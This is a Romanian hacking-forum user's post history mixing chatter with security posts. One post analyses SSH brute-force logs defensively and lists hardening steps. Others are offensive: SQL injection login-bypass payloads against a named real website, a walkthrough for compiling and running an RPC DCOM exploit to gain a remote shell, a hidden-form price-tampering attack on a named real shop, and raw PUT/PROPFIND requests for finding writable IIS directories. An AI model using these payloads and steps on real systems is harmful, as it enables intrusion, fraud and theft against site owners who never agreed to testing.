Jump to content

escalation666

Active Members
  • Posts

    567
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by escalation666

  1. @sysgh0st: i don't know....cred ca te-ai plictisii @Stress: http://en.wikipedia.org/wiki/Pentesting si ar fi mai multe de spus despre pentesting, si un lucru important, si care observ ca nu este specificat pe wikipedia este asa numitul get-out-of-jail card , un document semnat de cel care te angajeaza pt pentesting, si care te poate scoate din posibilile probleme.
  2. Salutare! Ma bucur sa va revad, si sa observ ca rst-crew a devenit un grup de ethical hackers, schimbare ce a coincis si cu schimbarea mea la statutul de administrator si ethical hacker Va voi prezenta un mic articol despre viata de admin, si hackingul vazut dintr-o alta perspectiva acuma. Se pare hackerii sunt inca tineri si nelinistiti...de fapt sunt din ce in ce mai tineri si din ce in ce mai script kiddies. Va voi prezenta aici de cate ori voi avea ocazia, tentativele de hack impotriva serverului, in scop educativ ca sa spun asa, dar si ca o avertizare pentru amatori. Nu inteleg de ce unii oameni prefera sa isi foloseasca energia si cunostintele in scopuri destructive si inutile, in loc sa prefere sa realizeze ceva constructiv si util. Probabil acest fapt se datoreaza si naturii umane, inclinata mai mult spre rau decat spre bine, dar si usurinta de a distruge un lucru sau munca unei persoane, in comparatie cu satisfactiile obtinute de realizarile proprii. Acum, va voi prezenta fragmente din fisierele log, cronologic, dar si actiunea mea de backtracking si de depistare a kinderilor malefici. Trebuie sa precizez ca cele mai multe atacuri sunt de tipul ssh brute-force, dar am inregistrat si alte tipuri, cum ar fi, mysql worms sau scanari. Feb 25 15:39:02 (none) sshd[8059]: Did not receive identification string from 210.188.217.208 Feb 25 15:43:00 (none) sshd[8518]: Invalid user jack from 210.188.217.208 Feb 25 15:43:00 (none) sshd[8518]: Failed password for invalid user jack from 210.188.217.208 port 34238 ssh2 Feb 25 15:43:05 (none) sshd[8528]: Invalid user marvin from 210.188.217.208 Feb 25 15:43:05 (none) sshd[8528]: Failed password for invalid user marvin from 210.188.217.208 port 34320 ssh2 Feb 25 15:43:09 (none) sshd[8540]: Invalid user andres from 210.188.217.208 Feb 25 15:43:09 (none) sshd[8540]: Failed password for invalid user andres from 210.188.217.208 port 34413 ssh2 Feb 25 15:43:17 (none) sshd[8556]: Invalid user barbara from 210.188.217.208 Feb 25 15:43:17 (none) sshd[8556]: Failed password for invalid user barbara from 210.188.217.208 port 34486 ssh2 Feb 25 15:43:22 (none) sshd[8566]: Invalid user adine from 210.188.217.208 Feb 25 15:43:22 (none) sshd[8566]: Failed password for invalid user adine from 210.188.217.208 port 34640 ssh2 Feb 25 15:43:26 (none) sshd[8578]: Invalid user test from 210.188.217.208 Feb 25 15:43:26 (none) sshd[8578]: Failed password for invalid user test from 210.188.217.208 port 34722 ssh2 Feb 25 15:43:32 (none) sshd[8588]: Invalid user guest from 210.188.217.208 Feb 25 15:43:32 (none) sshd[8588]: Failed password for invalid user guest from 210.188.217.208 port 34810 ssh2 Feb 25 15:43:43 (none) sshd[8602]: Invalid user db from 210.188.217.208 Feb 25 15:43:43 (none) sshd[8602]: Failed password for invalid user db from 210.188.217.208 port 34936 ssh2 Un host compromis din Japonia, lanseaza atacuri de tip bruteforce. Sa vedem, ce ne spune site-ul http://wq.apnic.net/apnic-bin/whois.pl, despre ip: inetnum: 210.188.217.0 - 210.188.217.255 netname: SAKURA-NET descr: SAKURA Internet Inc. country: JP admin-c: KT749JP tech-c: KW419JP Mai mult, sa aflam detalii despre hostul compromis, folosind nmap: Interesting ports on 210.188.217.208: Not shown: 1664 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 1.1.3 22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99) 23/tcp open telnet Linux telnetd 25/tcp open smtp Sendmail 8.12.11.20060308/8.12.8 80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux)) 110/tcp open pop3 UW Imap pop3d 2001.78rh 113/tcp filtered auth 135/tcp filtered msrpc 137/tcp filtered netbios-ns 139/tcp filtered netbios-ssn 443/tcp open http Apache httpd 2.0.40 ((Red Hat Linux)) 445/tcp filtered microsoft-ds 1720/tcp filtered H.323/Q.931 3306/tcp open mysql MySQL 3.23.58 8009/tcp open ajp13? 10000/tcp open http Webmin httpd Device type: general purpose Running: Linux 2.4.X|2.5.X OS details: Linux 2.4.0 - 2.5.20 Uptime 195.309 days (since Mon Aug 21 03:29:09 2006) Service Info: Host: www.insilicobiology.jp; OSs: Unix, Linux Dupa cum vedem, nmap ne-a oferit o multime de informatii utile despre serverul in cauza, de asemenea conectandu-ma prin telnet, am mai aflat si versiunea de kernel, si anume, 2.4.20-31.9.progeny.8smp, o versiune cam veche, si probabil fara patch-uri. Cum a fost compromis acel host? Cu toate ca n-am intreprins nici o actiune in sensul acesta, adica sa scanez dupa vulnerabilitati sau sa incerc un bruteforce, pot presupune doar ca a fost compromis prin una dintre aceste metode. Sunt destul de multe servicii deschise, versiuni vechi, si probabil vulnerabile la diferite exploituri. De asemenea, telnetul si ssh sunt o invitatie irezistibila pentru script kiddies sa isi incerce noile programe si scripturi de bruteforce, iar un username comun, si o parola la fel de comuna, sau si mai bine, aceeasi ca si username-ul, pot duce la compromiterea serverului. Un atac, destul de finutz, vine de la un host din Brazilia: Feb 25 22:39:15 (none) sshd[14714]: Did not receive identification string from 201.63.40.18 Feb 25 22:42:04 (none) sshd[15056]: Failed password for root from 201.63.40.18 port 52194 ssh2 Feb 25 22:42:04 (none) sshd[15056]: reverse mapping checking getaddrinfo for 201-63-40-18.customer.tdatabrasil.net.br failed - POSSIBLE BREAK-IN ATTEMPT! Feb 25 22:42:16 (none) sshd[15086]: Did not receive identification string from UNKNOWN Si atacul se opreste aici. Spre binele lui....poate ca omul acela era doar curios dar neah...don't think so Sincer, vroiam sa fac un honneypot, ca sa vad si eu dintr-o perspectiva unica atacurile si pulsul comunitatii de hackeri si cu ce se mai ocupa, dar momentan se pare ca am parte de actiune si aici, asa ca ideea si realiarea unui honneypot va fi ceva mai departata in timp. Ziua urmatoare, un alt host comprmis doreste sa se "afirme": Feb 26 20:10:25 (none) sshd[10049]: Did not receive identification string from 67.15.2.36 Feb 26 20:14:11 (none) sshd[10521]: Failed password for root from 67.15.2.36 port 49177 ssh2 Feb 26 20:14:11 (none) sshd[10521]: reverse mapping checking getaddrinfo for servidor5.molservidores.com failed - POSSIBLE BREAK-IN ATTEMPT! Feb 26 20:14:12 (none) sshd[10525]: Failed password for root from 67.15.2.36 port 49452 ssh2 Feb 26 20:14:13 (none) sshd[10525]: reverse mapping checking getaddrinfo for servidor5.molservidores.com failed - POSSIBLE BREAK-IN ATTEMPT! Feb 26 20:14:14 (none) sshd[10531]: Failed password for root from 67.15.2.36 port 49559 ssh2 Feb 26 20:14:14 (none) sshd[10531]: reverse mapping checking getaddrinfo for servidor5.molservidores.com failed - POSSIBLE BREAK-IN ATTEMPT! Feb 26 20:14:17 (none) sshd[10535]: Invalid user admin from 67.15.2.36 Feb 26 20:14:17 (none) sshd[10535]: reverse mapping checking getaddrinfo for servidor5.molservidores.com failed - POSSIBLE BREAK-IN ATTEMPT! Feb 26 20:14:17 (none) sshd[10535]: Failed password for invalid user admin from 67.15.2.36 port 49657 ssh2 Feb 26 20:14:18 (none) sshd[10543]: Invalid user miquelfi from 67.15.2.36 Clara care este originea atacului. As putea face un backtracking, dar in lipsa de timp, modelul japonez va servi drept exemplu. Alte exemple: Feb 27 16:00:34 (none) sshd[22062]: Did not receive identification string from 62.193.234.15 Feb 27 16:04:32 (none) sshd[22533]: Failed password for root from 62.193.234.15 port 44709 ssh2 Feb 27 16:04:33 (none) sshd[22537]: Failed password for root from 62.193.234.15 port 44796 ssh2 Feb 27 16:04:34 (none) sshd[22541]: Failed password for root from 62.193.234.15 port 44848 ssh2 ------------------------------------------etc------------------------------------------------ 221.126.133.161, 83.170.28.56, 210.189.105.123, 193.47.83.157, 89.106.26.172, 200.93.130.236, 88.208.210.210, 211.223.127.50 sunt alte exemple negative. Cu toate ca altor administratori vizualizarea de log-uri li se pare plictisitoare, inutila, sau probabil nu au timp de asa ceva, ei nu fac decat sa inchida ochii si sa ignore. Dupa cum spuneam, natura umana este mereu inclinata spre rau, si trebuie sa gasim energia necesara sa-i educam pe acesti script kiddies, ca astfel, sa ne scutim reciproc eforturile, adminsitratorii de a-i depista si raporta, si kizii de a-si pierde timpul cu astfel de inutilitati. Voi reveni cu articole pe tema aceasta. Metodele de aparare impotriva acestui tip de atac sunt banele: -blocarea ip-ului dupa cateva incercari esuate; -autentificarea prin ssh folosind chei publice; -autentificarea ssh v 2.0, pentru a ne feri de cei care snifuiesc in retea si cei care incearca MITMSSH; -folosirea de parole puternice pentru root dar si pentru useri(diferite de cuvintele din dictionare, sa contina caractere de genul !@#$%^, si sa aiba o lungime mai mare de opt caractere); Dezavantajul blocarii ip-ului dupa cateva incercari ar fi faptul ca atacul s-ar putea ascunde in marea de informatii din log, si ar fi mai greu de depistat, dar si posibilitatea ca, in cazul in care ai o parola greu de memorat sa risti sa fii banat. Mie, cel putin, imi place sa vad cum se chinuie baietii cu bruteforce-ul lasand urme imense in log-uri .
  3. Hackinthebox SecConf 2003, 2004, 2005 and 2006 bineinteles http://video.hitb.org/
  4. gg flama! christmas...se poate si asa...probabil ai vazut chestia asta dintr-un tutorial video e util sa faci asta cand la username trebuie sa pui o adresa de email...si javascriptul nu te lasa sa pui ceva de genu [mail]dfdf@fdwfdw.com[/mail]
  5. http://www.fotoshop.ro that's the target Why? pt ca face spam Vulnerabilitate:sql injection Poc: user:admin'-- Database error: Invalid SQL: SELECT u.id_user, u.id_user_group, u.status, u.email, ug.level, u.user_name FROM site_user u, site_user_group ug WHERE u.password='' AND u.user_name='admin'--' AND ug.id_user_group = u.id_user_group MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND ug.id_user_group = u.id_user_group' at line 5) Am o lene prea mare zilele astea ca sa incerc sa aflu parola de admin. De asemenea, daca pui la user si parola 'or''=' o sa ai o surpriza placuta.
  6. vezi ca ti-am rasp la cereri...
  7. Don...your answer is on google http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0709.html
  8. da uncle fucker nu cauti?
  9. escalation666

    Vrajeli!!!

    stiu ca n-am cerut ink nimik...dar cer si io un scanner de femei cu o baza de vulnerabilitati updatata la zi....iar pt femeile care nu-s vulnerabile un progr de bruteforce.
  10. cred ca te referi la programul smart whois sau la comanda de linux: whois hostname/ip oricum nu prea se inteleg multe din postul tau care ar trebui sa fie la sectiunea cereri
  11. este doar un PoC...n-am continuat cu procesarea comenzii...si oricum n-as fi platit un dolar australian...mai era si shippingul de 30 de $...care vrea sa incerce...n-are decat
  12. noi'>http://share.urbanfriends.us/savefile_php/uploads/6cecefd162.rar noi informatii la tutorial
  13. Un exploit este un program care se foloseste de erorile si bug-urile din alte programe, permitand unui atacator sa dea anumite comenzi luand controlul asupra calculatorului afectat, sau escaladand privilegiile sale de local user pana la nivel de superuser sau administrator (in Windowz) sau root (Linux). Exploiturile sunt de obicei destinate pentru a fi compilate pe platforme Linux, dar pentru cei care folosesc Windows salvarea vine din partea programului Cygwin. Acest program contine 2 parti : - cygwin1.dll care actioneaza ca un Linux API emulator conferind windowzului functionalitatea sporita a linuxului. - o colectie de tools care confera un look de linux. Pentru a-l instala : downloadati-l, lansati-l in executie si urmati pasii de pe situl : '>http://www.eecg.utoronto.ca/~aamodt/ece242/cygwin.html Urmatorul pas este sa scanam calculatorul pe care vrem sa-l compromitem pentru a afla ce porturi deschise are. Scannerul Nmap este o buna alegere. (sau chiar WinNmap pt cei care au oroare la comenzi) Start-run-cmd-cd program filesnmap eu de obicei folosesc comanda: nmap –sS –O ip #sau( -sV pt a afla si versiunea sist de operare) (-vv pt a afisa informatii despre versiunea de daemoni) dar daca vreti sa folositi si alte caracteristici ale lui Nmap cititi manualul de utilizare. Sa zicem ca ati gasit un Windows SP1 fara patch-uri si cu portul 135 deschis corespunzator serviciului RPC DCOM. Acest exploit este mai vechi dar inca se mai foloseste, si in plus acest tutorial ofera know how-ul necesar pentru a folosi alte exploituri mai noi. Pentru a gasi exploituri trebuie cautat in bazele de date cu exploituri de pe siturile de la linkuri utile. Codul sursa al exploitului RPC DCOM il gasiti cautand cu ajutorul motorului de cautare google. Dati copy-paste in Notepad si salvati fisierul cu extensia .c Il savati in C:cygwinhomeAdministrator. Deschideti programul Cygwin si dati urmatoarea comanda pentru a compila exploitul $ gcc numeexploit.c –o numeexploit pentru a vedea comenzile exploitului : $ ./numeexploit -u Rulati exploitul si tocmai ati dobandit un remote shell pe calculatorul respectiv. Se observa ca exploiturile destinate a fi compilate in linux contin de obicei: #include <sys/types.h> #include <sys/socket.h> #include <sys/stat.h> #include <netinet/in.h> Exploiturile in python incep de obicei cu urmatoare sintaxa: #!/usr/bin/python Exploituri destinate a fi compilate in windows,contin de obicei: #include <stdio.h> #include <windows.h> #include <winsock.h> Exploiturile pt framework-ul metasploit:(contin unele din urm module, si trebuie precizat ca fisierele au extensia .pm) Msf::Exploit:: Msf::Socket::Tcp EXploituri in perl: #!/usr/bin/perl sau #!/usr/bin/perl -w Exploituri in php: incep cu <? si se termina cu ?> de asemenea iti dai seama din context(comentariile celor care au realizat exploitul, dar si din functiile folosite de php) Exploituri se pot compila (sau sunt interpretate) cu programe cum ar fi : Borland C++ sau Perl,Microsoft Visual C++,Python,gcc etc. De asemenea, recomand sa invatati niste programare, si sa cautati tutoriale despre buffer overflows.
  14. observ ca se mai practica hidden forms care accepta si au incredere in inputul userilor...un exemplu este acest shop iar'>http://shop.earlyholdens.com/ iar aici este un screen in care incercam sa cumpar un produs cu 1 dolar (si care evident costa mult mai mult) http://img124.imageshack.us/img124/399/screen1bmplp1.png
  15. nope...cei care fac cursurile astea le fac in engl
  16. thx, stiu colegi care dau bani grei ca sa faca cursuri CISCO bine....poate nu obtin o diploma, dar pana la urma cunostintele pe care le ai conteaza
  17. oh nu... toate actiunile si bonurile mele de tezaur de la NASDAQ.. ca RASDAQ e echivalentul romanesc....oricum cei care stiu putina istorie (anul 1929) si stiu ceva despre marea criza economica....stiu faptul ca daca va cadea ec americana...va trage cu ea si muuulte alte economii
  18. Permisiuni in IIS si diferite metode prin care un hacker le poate exploata sau le poate descoperi. In IIS exista urmatoarele permisiuni: Read: utilizatorii pot citi numai Write: utilizatorii pot creea sau sterge fisiere Execute: utilizatorii pot executa programe sau fisiere librarii (fisiere exe sau dll) Script: utilizatorii pot executa scripturile din aplicatiile web (de ex cele realizate in ASP) Directory Browsing: utilizatorii pot naviga si lista directoare si fisiere de pe acel web server In cele ce vor urma, voi arata cateva metode prin care ne putem da seama daca administratorul a setat permisiunile asa cu trebuie, sau nu, caz in care se va confrunta cu grave probleme de securitate. Execute: Solicitati un url aleator cum ar fi http://domeniu.ro/dir/aaaa.dll, daca serverul raspunde cu un mesaj de "500 Internal Server error", inseamna ca aceasta permisiune este enabled. Daca serverul returneaza un mesaj de "404 File not found" inseamna ca aceasta permisiune este dezactivata. Write: Cu aceasta permisiune puteti scrie si modifica fisiere de pe un anumit server. Pentru a vedea daca aceasta permisiune este activa deschidem telnetul si facem urmatorul request (pe portul 80 de obicei): PUT /dir/fisierul_meu.txt HTTP/1.1 Host: domeniu.ro Content-Length: 10 <enter><enter> Serverul va raspunde cu un mesaj de "100 Continue": HTTP/1.1 100 Continue Server: Microsoft-IIS/5.0 Date: Thu, 28 Feb 2006 15:56:00 GMT Daca reusim sa scriem pe acel server vom primi urmatorul raspuns: HTTP/1.1 201 Created Server: Microsoft-IIS/5.0 Date: Thu, 28 Feb 2006 15:56:08 GMT Location: Content-Length:'>http://domeniu.ro/dir/fisierul_meu.txt Content-Length: 0 Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK Daca serverul raspunde cu un mesaj de "201 Created" inseamna ca permisiunea de a scrie este enabled. Daca primesti un mesaj "401 Access Denied" inseamna ca trebuie sa te autentifici, dar permisiunea de a scrie este enabled pe server, numai ca tu nu ai suficiente drepturi pe acel server. Daca apare un mesaj "403 Forbidden" inseamna ca permisiunea este disabled. In cel mai rau caz, un server poate avea un director cu permisiuni de scriere si executie, permisiuni care nu necesita autentificare, si care pot permite unui atacator sa uploadeze un script si sa-l execute. Script: Pentru a vedea daca aceasta permisiune exista sau nu, incercam Daca'>http://domeniu.ro/dir/bbbbb.asp Daca serverul raspunde cu un mesaj de "404 File not found" permisiunea exista, iar daca serverul raspunde cu un mesaj de "404 File not found", permisiunea este dezactivata. Directory Browsing: Solicitati un url http://domeniu.ro/dir/ si daca primiti un mesaj de "200 ok" este clar ca puteti naviga prin acel director. WebDAV (Web-based distributed authoring and versioning) reprezinta un set de extensii al protocolului HTTP, prin care userii pot edita si administra fisiere pe webservere. De obicei, atunci cand un server are metoda PROPFIND, este probabil sa existe si WebDAV pe acel server. PROPFIND permite utilizatorilor sa caute anumite proprietati ale resurselor unui server, cum ar numele fisierelor, data la care au fost create, data la care au fost modificate etc. Deschidem telnetul si facem urmatorul request PROPFIND /dir/ HTTP/1.1 Host: domeniu.ro Content-Length: 0 Un mesaj "207 Multi Status" inseamna ca permisiunea de a naviga prin directoare exista. Trebuie precizat faptul ca pe langa acest mesaj, serverul va afisa si o lista de resurse si proprietatile lor. Daca directory browsing nu este enabled, vom primi tot acelasi mesaj "207 Multi Status" si tot aceeasi lista de resurse, dar cu mult mai putine informatii despre ele. Read: Faceti un request pentru un fisier inexistent: Daca'>http://domeniu.ro/dir/cccccc.txt Daca serverul raspunde cu "404 File Not Found" atunci aceasta permisiune este enabled. Acuma veti spune, da, dar cat de mult poate periclita aceasta permisiune securitatea unui server? Directoarele in care se gasesc aplicatii ASP au nevoie DOAR de permisiunea script, prin permisiunea read, un hacker poate citi codul sursa al aplicatiilor, afland informatii la care nu ar trebui sa aiba acces, informatii care il vor ajuta la compromiterea serverului. De exemplu, directorul in care se gasesc imaginile ar trebui sa aiba aceasta permisiune. Daca serverul raspunde cu un mesaj "403 Forbidden" inseamna ca permisiunea de a citi este dezactivata.
  19. WhiteHat Team....din cate se pare ei tocmai whitehat hackers nu-s si iarasi se dovedeste faptul ca cei de la nasa stau prost la capitolul securitate, topic la care am mai comentat
  20. gasesti aici informatii despre 419 Nigerian scams: http://www.zone-h.org/component/option,com_remository/Itemid,47/func,select/id,46/ am primit si io mai multe emailuri pe un id, si trebuie sa fii retardat rau de tot ca sa cazi in plasa lol, nigerienii aceia vb de sume f mari de bani cand ei mor de foame si de malarie.
  21. pai din datele din stire...care ar fi cam de prin 2004, Metal o fi printr-o puscarie romaneasca ori in SUA cu o pedeapsa de 90 de ani lol...ori se ascunde prin Hawaii sau Tahiti oricum, nu cred ca vei lua legatura cu el asa de simplu.
  22. wellcome pe forum
  23. Daca vrei ceva mai complicat cauta niste challange-uri pe site-urile de wargames...www.bright-shadows.net are o multime de provocari...de fapt tutorialul meu e inspirat dupa un challange de acolo (am vrut sa vad si in lumea reala cum merge treaba).Din pacate n-am mai intrat de mult timp pe acel site...dar chiar ai ce invata acolo!
  24. escalation666

    intrbare

    plutea intr-o mare de Coca-Cola pe un cub de gheatza....o baut toata Coca-Cola, o pleznit si nu o mai ramas decat cubul de gheatza care s-a topit si care impreuna cu ramasitzele lui au format o balta PS:si la sfarsit au venit hackerii de pe rst si i-au facut deface la mutra
×
×
  • Create New...